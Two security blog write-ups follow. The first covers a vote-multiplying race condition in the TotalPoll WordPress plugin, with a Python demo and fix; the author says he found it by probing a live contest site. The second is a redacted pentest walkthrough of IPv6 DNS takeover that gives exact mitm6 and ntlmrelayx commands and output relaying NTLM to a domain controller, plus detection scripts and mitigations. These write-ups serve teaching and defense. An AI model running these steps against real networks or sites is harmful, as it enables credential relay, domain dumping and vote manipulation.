Monday, May 22, 2023

WordPress TotalPoll Plugin Race Condition vulnerability (Write Up + AI generated blog)

Howdy Readers!



A race condition was found in the voting logic of the TotalPoll WordPress plugin. It lets one voter cast many votes, for instance to push a favoured streamer to the top of a contest poll, simply by sending the vote request many times at once.

The problem sits in how a vote is recorded. When a user votes, the plugin first checks whether that user has already voted (by whatever mechanism the poll uses to recognise a returning voter) and only then stores the vote and increments the option's count. Those two steps are not made atomic, so nothing stops several requests from passing the check before any of them has written its vote. The write-up does not show the plugin's code; this check-then-act behaviour is what the proof of concept demonstrates.

A race condition arises whenever two or more concurrent executions read and update shared state without coordination. On a WordPress site the concurrent executions are separate PHP workers serving simultaneous HTTP requests, and the shared state is the database. If the "has already voted?" read and the "record the vote" write are not a single atomic operation, every request sees the state before any other has written, and all of them succeed.

For TotalPoll this means one voter can cast multiple votes by issuing the same vote request over many parallel connections, which is exactly what Burp Suite's Intruder (or Turbo Intruder) is built to do.

That makes the bug more than a curiosity: poll results can be manipulated at will, so a contestant could, for example, inflate their own vote count to win.

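The check-then-act window described above, as an added example that is not TotalPoll's code (the write-up does not show the plugin's internals): a minimal in-process model of a poll that first asks "has this voter already voted?" and then records the vote, hit by many simultaneous requests from a single voter, the way Burp Intruder would send them. The sleep between check and write stands in for the database round-trip; the voter and option names are made up.

```python
"""The race in a check-then-record vote handler, and its fix.

Added example, not TotalPoll's code (the write-up does not show the plugin's
internals): a minimal in-process model of a poll that first asks "has this
voter already voted?" and then records the vote, hit by many simultaneous
requests from one voter, as Burp Intruder would send them.
"""
import threading
import time


class VulnerablePoll:
    """Check and write are two separate steps with nothing making them atomic."""

    def __init__(self):
        self.votes = {}      # option -> vote count
        self.voted = set()   # voters already counted

    def vote(self, voter, option):
        if voter in self.voted:        # 1. check: has this voter voted?
            return False
        time.sleep(0.05)               # models the DB round-trip between check and write
        self.voted.add(voter)          # 2. act: record the voter ...
        self.votes[option] = self.votes.get(option, 0) + 1   # ... and count the vote
        return True


class HardenedPoll(VulnerablePoll):
    """Same logic, but check and write happen as one critical section: the
    in-process equivalent of a UNIQUE(poll_id, voter_id) constraint or an
    atomic conditional UPDATE in the database."""

    def __init__(self):
        super().__init__()
        self._lock = threading.Lock()

    def vote(self, voter, option):
        with self._lock:
            return super().vote(voter, option)


def race(poll, voter="alice", option="streamer_a", n=20):
    """Send n vote requests from the same voter at the same instant and
    return how many votes the poll ended up counting for the option."""
    start = threading.Barrier(n)

    def request():
        start.wait()                   # all workers are released together
        poll.vote(voter, option)

    workers = [threading.Thread(target=request) for _ in range(n)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    return poll.votes.get(option, 0)


if __name__ == "__main__":
    print("vulnerable poll counted", race(VulnerablePoll()), "votes from one voter")
    print("hardened poll counted", race(HardenedPoll()), "vote from one voter")
```

Against a real site the "request" is the HTTP vote request replayed N times in parallel from Burp. The lock in HardenedPoll only works inside one process; PHP workers share nothing but the database, so the real fix is a unique constraint on (poll, voter) or a single conditional UPDATE, which makes the second concurrent vote fail instead of succeed.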
At the time of writing the author had received no confirmation that a fixed version shipped (see the report timeline below), so treat installed versions as affected unless the plugin's changelog says otherwise.

To protect a site, update TotalPoll to the latest version and check its changelog, or disable the plugin if you do not need it.

Some general advice for race conditions of this kind:

  • Fix it in the application: make the check and the write one atomic step, for example a UNIQUE constraint on (poll, voter) in the votes table or a single conditional UPDATE, so a second concurrent vote fails instead of being counted.
  • Rate-limit vote requests per session and source address on the server. A web application firewall (WAF) with rate limiting can blunt bursts of parallel requests, but it does not remove the race.
  • Keep your software up to date.

--Tools--
  • BurpSuite

--Proof of Concept--



Found this vulnerability 2 years ago while watching a stream on Twitch. The streamer announced she was nominated for a contest, so I checked the contest link and discovered the vulnerability after around 20-30 minutes of inspecting some of the website's features.


--Report Timeline--

Reported: May 12, 2021
First Response: May 12, 2021 (I'll need to check this with the team so we can decide whether we add "rate limitation" feature to the upcoming versions or not)


After reporting the issue, I didn't receive any updates from them.

I hope you find this article interesting and useful.

“Learn as if you will live forever, live like you will die tomorrow.”
— Mahatma Gandhi

Monday, May 08, 2023

IPv6 DNS Takeover via mitm6 (Write Up)

Howdy Readers!


If you're into network pentesting, I'm sure you're familiar with this type of vulnerability. This vulnerability is all about IPv6 and DNS. 


IPv6 is the latest version of the Internet Protocol, which is used to identify and communicate with devices on the internet. DNS or the Domain Name System is a service that translates human-readable domain names (like "google.com") into IP addresses (like "2xx.xx.xxx.xx2") that devices can use to connect to websites and other internet services.


IPv6 DNS takeover via mitm6 abuses a Windows default rather than a bug: IPv6 is enabled and preferred over IPv4, and every Windows host periodically asks for IPv6 configuration over DHCPv6, even on networks that run only IPv4 and have no legitimate DHCPv6 server to answer. mitm6 (man-in-the-middle for IPv6) answers instead: it replies to the DHCPv6 Solicit, hands the client a link-local address and, the part that matters, sets the attacker's host as the client's DNS server. It also sends periodic Router Advertisements to prompt hosts to (re)solicit. Nothing is routed through the attacker; only name resolution is taken over, and only for names in the domain given with -d, which keeps the attack quiet.


With DNS in hand, the attacker answers queries for the target domain with its own address. Because Windows looks up WPAD (Web Proxy Auto-Discovery) on its own, the victim fetches wpad.dat from the attacker, the attacker's "proxy" demands authentication, and the client's NTLM authentication is relayed to a service on the domain controller such as LDAP or LDAPS. The same position also allows the classic redirection of traffic meant for an internal site to a lookalike page that harvests credentials.

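What a poisoned client actually receives, as an added example that is not part of this write-up or of mitm6: a small parser for the DHCPv6 header and options (RFC 8415, with the DNS options from RFC 3646) run over a constructed Advertise message modelled on mitm6's behaviour, plus a check that flags any offered DNS server that is not on an allowlist. Every address, the DUID and the allowlist below are constructed; on a LAN that runs no DHCPv6 at all, any DNS server offered this way is rogue.

```python
"""Spot a DHCPv6 Advertise/Reply that hands out a rogue DNS server, which is
what mitm6 does to take over name resolution.

Added example, not part of the write-up or of mitm6: a minimal parser for the
DHCPv6 header and options (RFC 8415, RFC 3646) run over a constructed Advertise
message modelled on mitm6's behaviour. All addresses below are constructed.
"""
import ipaddress
import struct

OPT_SERVERID = 2
OPT_DNS_SERVERS = 23   # RFC 3646: concatenated 16-byte IPv6 addresses
OPT_DOMAIN_LIST = 24   # RFC 3646: search domains in DNS wire format
MSG_TYPES = {1: "SOLICIT", 2: "ADVERTISE", 3: "REQUEST", 7: "REPLY"}


def parse_options(buf):
    """Yield (code, data) for every TLV option; refuse truncated ones."""
    off = 0
    while off < len(buf):
        if off + 4 > len(buf):
            raise ValueError("truncated option header")
        code, length = struct.unpack_from("!HH", buf, off)
        off += 4
        if off + length > len(buf):
            raise ValueError("option length exceeds message")
        yield code, buf[off:off + length]
        off += length


def decode_domain_list(data):
    """Decode the length-prefixed labels of a Domain Search List option."""
    names, off = [], 0
    while off < len(data):
        labels = []
        while True:
            n = data[off]
            off += 1
            if n == 0:
                break
            labels.append(data[off:off + n].decode("ascii"))
            off += n
        names.append(".".join(labels))
    return names


def parse_dhcpv6(packet):
    """Return message type, transaction id, DNS servers and search domains."""
    if len(packet) < 4:
        raise ValueError("too short for a DHCPv6 header")
    msg_type = packet[0]
    xid = int.from_bytes(packet[1:4], "big")
    dns, domains = [], []
    for code, data in parse_options(packet[4:]):
        if code == OPT_DNS_SERVERS:
            if len(data) % 16:
                raise ValueError("DNS server option is not a list of IPv6 addresses")
            dns += [str(ipaddress.IPv6Address(data[i:i + 16]))
                    for i in range(0, len(data), 16)]
        elif code == OPT_DOMAIN_LIST:
            domains += decode_domain_list(data)
    return {"type": MSG_TYPES.get(msg_type, msg_type), "xid": xid,
            "dns": dns, "domains": domains}


def rogue_dns_servers(packet, legitimate):
    """DNS servers offered that are not on the allowlist of known resolvers.
    On a LAN that runs no DHCPv6 at all, any server offered here is rogue."""
    return [s for s in parse_dhcpv6(packet)["dns"]
            if ipaddress.IPv6Address(s) not in legitimate]


# --- constructed sample, built the same way the parser reads it ---
def _option(code, data):
    return struct.pack("!HH", code, len(data)) + data


def _dns_name(name):
    return b"".join(bytes([len(label)]) + label.encode("ascii")
                    for label in name.split(".")) + b"\x00"


ATTACKER = ipaddress.IPv6Address("fe80::1")                  # constructed
LEGIT_DNS = {ipaddress.IPv6Address("2001:db8::53")}          # constructed allowlist
SAMPLE_ADVERTISE = (
    bytes([2]) + b"\x12\x34\x56"                             # ADVERTISE, xid 0x123456
    + _option(OPT_SERVERID, b"\x00\x03\x00\x01" + bytes(6))  # DUID-LL with a zeroed MAC
    + _option(OPT_DNS_SERVERS, ATTACKER.packed)              # attacker offered as resolver
    + _option(OPT_DOMAIN_LIST, _dns_name("test.redacted.site"))
)

if __name__ == "__main__":
    print(parse_dhcpv6(SAMPLE_ADVERTISE))
    print("rogue DNS servers:", rogue_dns_servers(SAMPLE_ADVERTISE, LEGIT_DNS))
```

Fed with the UDP payload of DHCPv6 traffic captured on a switch span port (client port 546, server port 547), the same check is a cheap detector for mitm6-style poisoning, and it is the traffic the firewall rule in the recommendations below blocks.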

So below is the step-by-step procedure for executing the attack. (PS: This guide is from one of my internal network penetration test reports, so I redacted some sensitive information about the target.)


--Tools--

  • NMAP
  • NTLMRelayx from Impacket
  • mitm6

--Steps to Reproduce--


1. Determine the target's AD domain name with Nmap; mitm6 needs it for its -d option and ntlmrelayx for the WPAD host name in step 2 (nmap -n -sV --script "ldap* and not brute" 1x.xx.xx.x1).

Sample Output:

Nmap scan report for 1x.xx.xx.x1
Host is up (0.0020s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT     STATE  SERVICE           VERSION
53/tcp   open   domain            Simple DNS Plus
88/tcp   open   kerberos-sec      Microsoft Windows Kerberos (server time: 2023-05-01 10:20:01Z)
113/tcp  closed ident
135/tcp  open   msrpc?
139/tcp  open   netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open   ldap              Microsoft Windows Active Directory LDAP (Domain: test.redacted.site, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=test,DC=redacted,DC=site
|       ldapServiceName: test.redacted.site:[email protected]
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: XXXX
|       supportedSASLMechanisms: XXX-XXXXXX
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
|       supportedLDAPPolicies: MaxPoolThreads
|       supportedLDAPPolicies: MaxPercentDirSyncRequests
|       supportedLDAPPolicies: MaxDatagramRecv
|       supportedLDAPPolicies: MaxReceiveBuffer
|       supportedLDAPPolicies: InitRecvTimeout
|       supportedLDAPPolicies: MaxConnections
|       supportedLDAPPolicies: MaxConnIdleTime
|       supportedLDAPPolicies: MaxPageSize

<--snip-->
The scan identifies the host as a domain controller and gives us the domain name, test.redacted.site. Note what it does not tell us: an open LDAP port is a prerequisite for relaying to it, not proof that the relay will work. Whether a relayed NTLM authentication is accepted depends on the DC not enforcing LDAP signing (389/tcp) and LDAP channel binding (636/tcp).

The IPv6 DNS takeover itself is not tied to any port: it happens on the local link over DHCPv6 and Router Advertisements, before any TCP connection to the DC is made.

2. Start ntlmrelayx before mitm6, so it is already listening when the first poisoned client connects (impacket-ntlmrelayx -6 -t ldaps://1x.xx.xx.x1 -wh fakewpad.test.redacted.site -l lootme). -6 listens on IPv6 as well as IPv4, -t is the relay target, -wh is the WPAD host name whose PAC file points clients at our proxy, and -l is the directory for the loot dumped from LDAP.

Sample Output:
impacket-ntlmrelayx -6 -t ldaps://1x.xx.xx.x1 -wh fakewpad.test.redacted.site -l lootme
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Serving PAC file to client ::ffff:1xx.xx.xx.1xx
[*] SMBD-Thread-6 (process_request_thread): Received connection from ::ffff:1xx.xx.xx.xx, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Serving PAC file to client ::ffff:1xx.xx.x.xx
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED

<--snip-->
As you can see, ntlmrelayx already reports SUCCEED: the client's NTLM authentication was relayed to LDAPS on the DC as TESTCLIENT/TESTUSER1, after which ntlmrelayx enumerates that user's privileges and dumps the domain into the loot directory. (This output was captured with mitm6 from step 3 already running; nothing arrives until clients have been poisoned.)

3. Open another terminal and run mitm6 with the domain from step 1 (mitm6 -d test.redacted.site). The -d value is the search domain handed to clients and the allowlist of names mitm6 will spoof answers for (the "DNS allowlist" in the output); keeping it to the target domain keeps the takeover targeted.

Sample Output:
mitm6 -d test.redacted.site
:0: UserWarning: You do not have a working installation of the service_identity module: 'No module named 'service_identity''.  Please install it from <https://pypi.python.org/pypi/service_identity> and make sure all of its dependencies are satisfied.  Without the service_identity module, Twisted can perform only rudimentary TLS client hostname verification.  Many valid certificate/hostname mappings may be rejected.
Starting mitm6 using the following configuration:
Primary adapter: eth0 [00:xx:xx:xx:xx:xx]
IPv4 address: 1xx.xx.xx.xx
IPv6 address: fxxx::2xx:xxxx:xxxx:xxxx
DNS local search domain: test.redacted.site
DNS allowlist: test.redacted.site
IPv6 address fxxx::2xxx:x is now assigned to mac=xx:xx:xx:xx:xx:xx host=TESTHOST. ipv4=
Sent spoofed reply for mgmt.test.redacted.site. to fxxx::xxx:xx

<--snip-->
4. Once a relay has succeeded, ntlmrelayx dumps the domain (users, computers, groups, policy, trusts) into the lootme folder given with -l. Open another terminal and list it (ls lootme).
5. Review the dump. ntlmrelayx uses ldapdomaindump for this, so each object type comes as .html, .json and .grep files; domain_users.grep, for example, is what feeds the next phase of the test.
6. Verify the finding: the SUCCEED lines show that a relayed authentication was accepted by LDAPS on the domain controller, which means channel binding is not enforced, and the dump shows what an attacker on the LAN obtains from one poisoned client without knowing a single password.


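Reading the relay output is easier with a little triage. The script below is an added example, not part of this write-up or of Impacket: it parses the console lines ntlmrelayx prints (the formats are the ones shown in step 2) and reports which clients fetched the PAC file, how many connections were relayed from each source to each target, and which accounts the target accepted. The addresses and accounts in SAMPLE_LOG are constructed, not taken from the engagement.

```python
"""Triage an ntlmrelayx session log: which clients were poisoned, what was
relayed where, and which accounts authenticated successfully.

Added example, not part of the write-up or of Impacket. The line formats are
those ntlmrelayx printed in step 2; the addresses and accounts in SAMPLE_LOG
are constructed, not taken from the engagement.
"""
import re
from collections import Counter

PAC_RE = re.compile(r"Serving PAC file to client (\S+)")
RECV_RE = re.compile(r"Received connection from (\S+), attacking target (\S+)")
CTRL_RE = re.compile(r"Connection from (\S+) controlled, attacking target (\S+)")
AUTH_RE = re.compile(r"Authenticating against (\S+) as (\S+) (SUCCEED|FAILED)")


def plain_ip(addr):
    """With -6, ntlmrelayx shows IPv4 peers as IPv4-mapped IPv6 (::ffff:a.b.c.d)."""
    return addr[7:] if addr.startswith("::ffff:") else addr


def summarize(lines):
    """Aggregate one session log into poisoned clients, relays and auth results."""
    poisoned = set()      # clients that fetched our PAC file
    relays = Counter()    # (source client, relay target) -> relayed connections
    auth = Counter()      # (target, account, result) -> count
    for line in lines:
        if m := PAC_RE.search(line):
            poisoned.add(plain_ip(m.group(1)))
        elif m := (RECV_RE.search(line) or CTRL_RE.search(line)):
            relays[(plain_ip(m.group(1)), m.group(2))] += 1
        elif m := AUTH_RE.search(line):
            auth[(m.group(1), m.group(2), m.group(3))] += 1
    return {"poisoned": sorted(poisoned), "relays": relays, "auth": auth}


def compromised_accounts(summary):
    """Accounts whose relayed NTLM authentication the target accepted."""
    return sorted({acct for (_, acct, result) in summary["auth"] if result == "SUCCEED"})


# Constructed sample in the format ntlmrelayx prints; not the engagement's data.
SAMPLE_LOG = """\
[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Serving PAC file to client ::ffff:10.0.0.21
[*] SMBD-Thread-6 (process_request_thread): Received connection from ::ffff:10.0.0.21, attacking target ldaps://10.0.0.5
[*] HTTPD(80): Serving PAC file to client ::ffff:10.0.0.22
[*] HTTPD(80): Connection from ::ffff:10.0.0.22 controlled, attacking target ldaps://10.0.0.5
[*] HTTPD(80): Connection from ::ffff:10.0.0.22 controlled, attacking target ldaps://10.0.0.5
[*] HTTPD(80): Authenticating against ldaps://10.0.0.5 as LAB/USER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://10.0.0.5 as LAB/USER1 SUCCEED
[*] HTTPD(80): Authenticating against ldaps://10.0.0.5 as LAB/SVC1 FAILED
"""

if __name__ == "__main__":
    s = summarize(SAMPLE_LOG.splitlines())
    print("poisoned clients:", s["poisoned"])
    for (src, target), n in s["relays"].items():
        print(f"relayed {n}x from {src} to {target}")
    print("accounts accepted by the target:", compromised_accounts(s))
```

Run it on the saved terminal output of a real session (redact before it goes into a report); the accepted accounts and poisoned clients are the evidence the finding is written around.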

--Recommendations--
  • The safest mitigation for mitm6 is to block DHCPv6 traffic (UDP 546/547) and incoming Router Advertisements (ICMPv6 type 134) with the Windows Firewall through Group Policy, rather than disabling IPv6 outright, which Microsoft advises against because it has side effects on Windows itself (see the first reference).
  • If WPAD is not used internally, disable it via Group Policy and disable the WinHttpAutoProxySvc service.
  • Mitigate relaying to LDAP and LDAPS by requiring LDAP signing and LDAP channel binding on the domain controllers.
  • Add administrative users to the Protected Users group, or mark them "Account is sensitive and cannot be delegated", so a relayed or captured authentication cannot be used to impersonate them through delegation.

--References--
  • https://docs.microsoft.com/en-us/archive/blogs/netro/arguments-against-disabling-ipv6
  • https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course

The vulnerability was rated as Critical in our pentest reports.

I hope you find this article interesting and useful.

"Always remember that you are absolutely unique. Just like everyone else."
–Margaret Mead